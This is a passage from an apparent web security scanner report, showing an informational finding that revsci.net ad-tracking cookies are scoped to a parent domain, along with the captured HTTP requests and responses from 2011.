udm_0=MLv39C8JZjpr557JwHIRxa5jdQTtJkLnfaG2qg26ZB+wNcQAqiLCTArLHxzvFq5u+Lz+XYjpAOoQ3aXCaMwHVm5cOqJ/d0MlRvTibudFpMUy2dKvpoh2P1mo4DwSF+J5ify/opKpgIxdjs+cX7AMJNbmkATqRCOXSBhPjm35XiawTtcNGQ5TJTiyxPEjXmxThYMLjriRmFvX70E3qN+4fQApOrjujKnAezgCnqbkesD3qtu7yg1H6t/ZCZjuqzbWj5lhOPrgUkFqFOsR5PZJAHdlKcx36ghEs5TWYHJ7Hb5xhWh0E2l5fLBFFP9WPKwWobSjkhpMDi+Kp1AIHk641P8IlIrWomP6IcaKegywe6Owy1lDPNerTKWUsO8YrjXR5olzyy6wLXb6gGqI3omVUL7fPu++A+wGAueB+FZJSxpjEvAreK7XIBTbcuoepx7qL5iMjyaXf9oM3XBiaEFzMNfE0EZUNyI851k2V1WfrejH4WhOwF/zC5Qx1MY4y6GGgNgNnM6HD7V0uycF+LhqJykGY4YcHQb969KlSx75jpXGB/Y/ThqH6llUenum15V8qhTvK/opGkRWSfypvacJFo/PisZ7zXvuoJPtRRvXdS91YPPi/PBgeOZkud3dhFAVymyT7s9aCy71tzZKcb+WKzUOfzdMURGelSLRiHB4XNxnJXS3aqrXBYAsmSu6iffgdJbwMaQekImLZY2TpMIEMIOwOVqRjv2KFv/fX3qS+FWOr2FXXkZjHTVFk5x0LCjJvfrRTvguz3DQbRk3HqOXmqZLJ5j/TXB5bo/MUYug8GlJm7j6TV56dmytyVVvb57ptvBNIgIwn6gR0mAdauLi+ddLwer1QnY/bDEfG507iGGrWyey/94fKyf08GlPmrwfeCUoafeWMYYsJtm/eyN5qIcmcZJeABqdn/9AcMC6mzYb4PGeNu/dr6gt21ABJDq7eJuaFP/RsBfVywN1CTWacnW9m/q5EM9J5MXRoLvnNM9IpaiCzJ8bs79erS+p9F5OJhHllfV8eWdDTtXvA9CnZalLPrGmqw4k9zwZNx0B1clOEPwH5yAlBM4opzlyVEoCF41x7KJj1/ZcwMyTwixt9Mb5iwRRiknHNgfkPDAzchcRdUulOpcg3ATua/3S7CAqTorLhCI6dYrWicgZcOEovUJIdhOG6gYyHef9Ru9lEst4DOzCXkT4zpeT1AyLuQ9Z99q9RBqO9+6yHMAVu5Ordcpplfmw84Ma1JYivS7vq1attqs5EJ7InICNPhTee28EyNp+84w1gvdN25jlYD98oAIdyzgUvUZuGspBPijyfewcj8G0XYzVD2dP1+fV/2/h1ge05Wg9JZ3wAItavV83LWV6mgBqCi29FCEmC1i2znwJzJao4Xeu3lR6It7bRRkLGkctRzQtZZJTMOfSZMCxUakuD0y1LkFwOmg3fVWDcLwE9WJY9rH2QYSk8UOjOZ+l4HB94xgHkRRAb3s2CmWW+sMtGsDM6ZEwDsT+AJZk36vciN7xsCmB7sJEYxcBeN70Q+53oATqe9cGbyzmI5FwovuwZA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_6SVK=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4kmheQIMDjaxY4NY56qG7poa4ScLEaatLDiorNn5vw/ZUtic7CM+ql6+GQ3/2mfzBOt0uz4ioZbxdZ4yKQR6q2VPvFKPznRql5h8iOvwP/r7Uf9IwSmkFH0NoNDiWsOdoP7A+KE3858M0WhU+zdS/59inCiCUTWQLaizzQIR1Jh2FmjnSE2fdifYxO0hFnS9FxZXoM+ewAQ+WVQFcEZFaUeEkXZNT/PBQgjdRcK4WGBrlOv1DqmZz7xuATb8CytltZbgXJJY58xcZwnCXCHFuTkIHFW1FoL2aE3zRAgMg51YquKmovdXv+QV0fhRfnE6xPSyEMpC58Mxj+nWjf7oD6WG0lAcTegTtCOgCgI2k1pcgBbUwiV80ods8sxbygUz1dWn6ZUvSekSbxlwCdRn098aaj47CC7oVk9kO1pb0VM9cA3b665SB+OhF1zFHEkp/+QDgoNrBn8VKykiY+qLw/Bu+8Nctq5EdHrD86cthCAfjJ+JvhBtr+hvqcWrBDZZ+BOW2Zj+sZGvsnMIE70w1kK6+FcYdWh7pzpV71WufhmJZAsP9t0SA6EQrS3/mb6hBtyus6WizP/iq6oNZERiMkyG4bHD5g0lcaW8LBUqxKHj8/Tqt+nPtAzGxPA1sGQ5x1/GDy6rIH0dmflRdEw4eI+C4e8g5L+zpQkeNco1i6W1TmWS8ddUxVEYkFvTgqscQGR2CT4TqyQ5P7VYSokaeW2RJdMkFPRFl0wJFkVyVYTst5kLNlTOSewhb3OmW4N3Mne/l1d+HJACtoFxAji0GHuoTyUdi5TqQ6rYK5yqaf9YyGEF3AbHBA==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:38:26 GMT; Path=/
Set-Cookie: NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b0b2&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Thu, 09-Jun-2011 11:38:26 GMT; Path=/
Set-Cookie: rtc_Pt3a=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:38:26 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:38:26 GMT
Content-Length: 699

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['E05510_10428'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-
...[SNIP]...

13.57. http://pix04.revsci.net/H07707/b3/0/3/0806180/203086575.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/203086575.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF4kOheAIMDjaxq2F29zEFqICTC+braGYRkX2ILzU0ubO+NO1EpsZ5SuHqPlIcMQ/0lXam/+piUhfp6MYDi5Ltmb3W/u0nGlRZLTdLeKuvFLJgwTUBQGmkGThl5pam9X0SDfBM1hv0IyFY0OJlD25LZxlv9giU9jzd4cBIDZmhH54Gojd6/jUtx5FZUgM0a+E9ZSdZZI5yoFedrb8//hiG6CEgOEMFcjoIeueUCxtkaeQDfr1Ybo11k8JXewFWXjFkF7Clb5Fbawer1yrgahjjsBaE5ImfVwFDpu70tLiWFMA3kByEjqxkCdipzMTXYEaeZJ6BgxzRBIFTNqAqAzi/oX38PIZd66GdRlw8ucpDQxfmw6gdlHEU9znYrpDT4IHGwFrIVJvCqMoVFODAapUufdY9wfxryj4I4tUp6M1QwerLGSqWdi/5zP8Tczymm7yXUan3PBm+/v+pJydx2y4M/bpTik+dJkknw763IQz49m9/lp1xnGhB4rBJAilJb7rRfb1QpgqVkYr0LKAmIEnp+MOPBdEoEOQtUtl9mNyfeZ0o0vJ3TMg+0ybtwr5WKuG4CyJaerSWqG6+zaw3jmwxR63lfJqcBVOtpwnNvfz/fCFZe8ylIa/BMzgeHRC6dvYmU4reagzBAkh4i5kSxtwbOhcV3Cy1XGJAht5G1Q2bdyaxqHaj4Oa2P8csqTtEL8sW1qo1xQfNlI5qOPJGGlpX0zHyHPmhpn/MmF2MU2O1Wl3oRKRA1mGN/u2wrZ8lnqzpMHmMYzTXfJOZcCFpZWp5amWwhA==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:15:55 GMT; Path=/
rtc_WdNx=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:15:55 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/203086575.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252Fcategory%252Fmain-topics%252Fmergers-acquisitions%252F%26DM_CAT%3DNYTimesglobal%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9CEJZjpv597JwPIRxS7gdG4nwPCqf6GGn7aMZB+wNajXBF+Nd1a01tm80x2HLZXYXYhFrnW54ugjciqgGm0tFOfpQeajGmdmQRYo7iifhXcq3Wbs+0M+s7Er2k8tdZWVCBvtko5Zjp8Cj5v2E8ykI+gHIp9/hRPdDeYJcxcbADkCInkuWb3Npj5APREYj/xsHpSZBntv8EoAPRzrJrHWs2DOkRntedZLjOdhyHvTXN5pS4V7upcIjIuq2z7/nsdjrAMbyqK4kakCxviNxTGNlMARgyVMGXMgEZ2MLmd9Zbk6kIOT4fYg/J9/u3Chb6WYqZH/gV9G+oqdCe0W2L6aw0qpg1Y3BGqAUEvNq0wvrdVS7MvhTer7OYchsu6sTh/u9Gx6BNO3snaQim+a62aktgfQiAKgkbpSF0g6cYHhhiyEFKwRC3npVrJ8/n2a2ovJdrav5tzyZWxscutuDcLLKfMWG1aDzsJbjDhFz2ddOIynfvJZctFB3b642LkOMBqRzuhpRVS0fgTcqmLx1keW2dFZvbqqC46u+lqciRYAyQyep75BilOD63Cj5ePrU2dYqoElDy1Q1zuhixxdNaYw9GYvIHwZqfDGLhllmm6jaYnrUSeU99lAYeebrrwB0w6Ss8l6yO8a3fMhnvkEhGRAc4dRmSBXIglruiT3OQ2Sy2583rqhTZEKzHPTgqj+vWqN/4sa/d7YtbZAPV7ZMr01URBWAwka6PgCHcBRUt5tvpqMxBw3J5v8cflNbQMJTZqakbw/kZnwNRNyDgpVxP5WWW8hyAESrsHJF6BoiekbZ+a17IqqEtet6Ps3M3KVki7DJtb4R8rt2+XcLazxCdO977gYFd3hKll5dpzZ93z4Z6NosW5/fSxPmw0enLLbCda7zg0Vqrdnw1uXgPkuiNsn5D8PQ92/UW2lFCIvX2kUBiaRsXjgjbttbky196hNLztjQJdAKEkJmoD9Po1VF/Q2z+kAkXPcJgQAJrfPqO/AqKJA6hLL/IaTIL9asqXLCkO8JzvGwzbmLuFdzlqjdXBEQBJruGD750oA4VbPahg2RF3BbsBBfKOU1w3x64Y0JY/AcLuk6374bkWMKsbigZmqBmjxn34pzoiCsF4/QetnQHdIgvQUvl2RDSzSZGSXknTcaWtLYdMFf0snFL7u9LmBRlIadUGBur5qdwbM72e+34rOTffbJzWjRqH4m7UoKb3/bCiCwAygp71VgqahtO6s92x8FQLUppqTeUdLBVIASTHDpP32AiUEJiUZaAIl1/S0GPjsuBgV/YRFkUw+/7ngkZTEUqwOiy8Q+8bLyk6rct3FjNQEZcSLDuJoIyyzyhb4OVT4cYIqNqkLnRiL6vYqUStAMDKWCXoGRGFWbbnPgT89BL26vRV7EF5Zs47HQMdwcgfd5Ticg1NzMi6mmwQ0y9DrCkZh8Be4luXrF3JUgZbOxmeNU9kgCBKcZqkCH3y1JiU81vGbJ7FxRBbHB/pWIncUViSCYDZnySw=; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; rsiPus_UVQe="MLsXrrEOpxpv55DW8tahZ2a57v6B9MeZL8/LTEv/jJaMn5vP+AaSaAp+hCNi+AtwkjW+RefXIKCFOb52VlJjrhtz/K0F0sWwzeRtpIdluxQek5zccFWsHLi2KM+ZjwDQCJV6O2MoC7r7STaLvqoiVDgloVhGO8DCKXMuP6S0vV0rRPMr+4FQiZzVfCjm2Lh/YkpRiZOeLmjUput9lWGJP3YqjHBlGcOU6aAjfq4ibjAuZaifAD12GV3MM7Os90125jNjah5Wl2JWXp3qoPuhHB9AUM9SIgkXkhFkXawqpm+PCmBL/rRLkNvRLqXizj1nhBAYelUSwkeFm7FWTh3bAW46hLZnvrDEVxxdlStZX6BLgYWkTXAr7NhngfM63uGRFwshyT0vUcCHgJHtHjwqb4gUK3U3Xlk/qfEyRIX0CYp3yLh6JdWmKGvTop06tZ57NWC7sYJivG6/XJXPh9kiLGmrABOJg0ZtLzzv+RMLBnPdhWdsfqH1YJwZA8zu9RM24LtkIq/AzoH015WS8axndbNjVCS0Jdy2g7tnbT4ibdPnWCemmw5DLKt17XfJqmkiLo4HNRYEQTYElhU3p/R3QmwWF2NkS16R2OV/GC10lX1vNK73Ft5xFtY5cXx7HXqH4NDid4ya00d1KxDbeGs2zvRtLTQCJxhQMPTkN34kd77C6G35LeJs2UWyjbLbkj1s/WgXM/d2WrgMkJc95WcpztNpB3veCMTXHtRpRP9j79S2eDr/UTmxj81QK+a4V5co3htv2qle9Hfxbq0j9sdrznUKUWJ5WYe1DlAdBsYmSOhPpIiQM0NaLNkyRwyAYAqCh7y5c4nZ6Tpo0r6KsvGwNO/t8O1yT6/GShgeyHXi1IvvZ0hstn43x+lxdVmaPuYX2sSMnPn4QKa12/fY0tPU6ddfwTD+9bgfDbO13IsHs6f5j2+r+EtZari1WX6nbA7T++lDvkLjcIrOl4601kWzvvi98b2F7OSSGvaJpJGavbpF/2BIRW/HC0h5tpMEm6W7+erhn93u1cBSkOvDoCr0GepDjUWA/1yQzlErEbvPIyhM3f4Jzt8JEyA2ePwz5BrQAUT9/dLtw8tewKVOKqP/qq9iEZ0wmdXyjf/AVeIc8f2yvlCzvSY+nfgoZk3nuvpBn+TM//Se4rR/DBpuCUDXQuA7A6XXEa7vK0oRNNNeyJKHti3Q1fiLowLkcct3KanqtvmCIU6n0kuFI6nT1Ahq/vOxwTNJbEJOQVxP2vHai7ZVs1Qa6BwHlMkcXR6E6DXWn7nbH651+v741MwSOh0TCFMQTTNGUekw4gX6f9HtRzUy5C/ACJ4xJ7a+tKlQGoDR42VY9foLr0PtTN/oCK3ykMmboo7thtABUtmg"; rsi_us_1000000="pUMV4ymjOCYULQEE166YFQ6DmFfDqOqv5R0Sep/xDdMQzQnGPlweaJXw308lcxsF58vOxVNcs8R89Us/bQw/0uEcBlgm3HbVBaqZciMXxA7ZQVsQNiAf++dJGYq1/xNl73YlZqAJtiAniZK+6WJ9mDbp1ivhzL5nEis7wXnPalOc+X8R2RVg+y8UNaZy5ZOc+H8kd4SG3Oo03tz7/dw18dKTWdxukwoaubmDFQHTMm4sRKbDfKN48UPoYMTs6BX1A4LF46V440ElFpoeJitf2h/pLwbuK0ljGz39v62Sma+Zo73lcvqhSmbjkU1Q6kZQoclEYeUyfIqfQY3sCsUUa8Sy9z7ZcgnF1atSKLPhTXaf6OoqzQEfeQWe3wpIUGn2GHtXLVGm45mmFmqunA7jZO2aHzuLCTp28NqBu8kCH+xHOE6jb7/4z7ZPkQJ+u/D+sZL25ZZoIAnJ4uU+LqTXIUpslqyUB5oWsUbJLKSoK89sf5wC46cWKHLCUCUx7V+Vn5AoBfDmY0qerCSkq63sxMnKVc7Y2mLTInWjV/ewZU9UjHPMkHGBtTX8t75ArQil/Na2GRTFUr5fhdfgzx5oueUv1FPRvGVMAAqoGtR13qVB/Vg2keSh/FCyLjGc7uE/9s+WRiFezbsVZeCcC+d9Eb880BuvdonWkyFfw1avjO6jM5wSjPV0ATxo8i0yFWFbNJIhhHcqIHXKggZNdINPohBJjEC1kJGLwFSXfTmEkpyH3TofsHIdXiJBg8muA/Jaj3c2fgkIteiYcB2Gz4Wn7j5HgmfS2ecJe+Trq7ITr9gPIZRpsJSIaO3EOUuYIwjyNdvXn8MfyMoxNDKjRes+Q8bR2sJdjoX8lZOkDh5J3PsAg0ikelhbA+xEPpzCrSjQCR2VevyKfKb/K0DBlXBwCdBzJqyGXNGQSDeXGHOCnhhj57KZMNSbLbSuOz5S21Yml1cbecDFyQsykG1JkFEr1ZDlBPWhf0lFBV6XAFRVrJ/a/JXiiBb4Eeg0AJ8vdp9Ilk5Na13QOPb71fp0boUamxNQpFz2NH9rpR1TOzhJz32LBycYZQry+MdshyoyJQ15G5TxeWDaczW4lSsMVYpvvQzqS8vRkGLOgMshXUu2E+a6xgsVGc11kHB8/aLJkwXFkcx4BF0L4s4ICThTh7CcKzozKJmM4LzFXXaINqTogC3wV5sXvBwSQfSVUd9lpwd9bs34Cb1OEjgd7rqkmnwwqP5uXurOGd8EYTeaGuv/qZPb8bTTalHpXy+PkGYZX13lAxeMItepWLPcaLLBpAYBKZ/Ihq1fKdq4TQe38T7YgQh+wnvRH1fjYGJmt5DWwZOw3wbIad2fJZShuZWCNnyIB6KCbPN4G/KTzUNy5kVqO+pBsdZW05zyp5FIuP0vYNGbMBkdNgMWUed6K/hEUdmSGEyP19JTJtDeHAag63fQkEjJ6twXzWTr1I7NaNzc+vCaGz5HPRVZafnlO/ulNenk6eGxbU9msVlICW6Fsoac7neLMtXq3KnjAoQSzlc37GR17Uli9FXO/9DpV+1KMKVSzhTj7dEU13glsLz96Zewco5Q